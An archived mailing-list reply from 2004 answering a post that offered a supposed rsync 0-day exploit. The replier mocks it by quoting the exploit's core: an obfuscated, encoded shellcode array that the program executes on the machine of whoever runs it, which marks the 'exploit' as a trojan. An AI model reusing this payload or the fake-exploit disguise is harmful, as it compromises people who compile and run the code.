Re: [Full-Disclosure] new rsync :) exploit rsync-too-open
From: phlox (phlox_at_freeshell.org)
Date: 05/29/04
- Previous message: dk: "Re: [Full-Disclosure] Breaking Laws Cisco's stolen code"
- In reply to: haxor_at_mac.hush.com: "[Full-Disclosure] new rsync :) exploit rsync-too-open"
- Next in thread: dkey: "Re: [Full-Disclosure] new rsync :) exploit rsync-too-open"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <haxor@mac.hush.com> Date: Fri, 28 May 2004 22:46:58 +0000
On Fri, 28 May 2004 12:20:30 -0700
<haxor@mac.hush.com> wrote:
> i found a nice email... with some strange code, i'm not a hacker but
> i think this is what some people call a 0-day exploit... :)
>
> i think you can use this to hack servers running rsync :)
>
> and as i support full disclosure i send it to the list.. happy hacking
> :)
Ahahaha!
char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";
(...)
(long) funct = &shellcode2;
(...)
funct();
-- phlox <phlox@freeshell.org> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: dk: "Re: [Full-Disclosure] Breaking Laws Cisco's stolen code"
- In reply to: haxor_at_mac.hush.com: "[Full-Disclosure] new rsync :) exploit rsync-too-open"
- Next in thread: dkey: "Re: [Full-Disclosure] new rsync :) exploit rsync-too-open"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
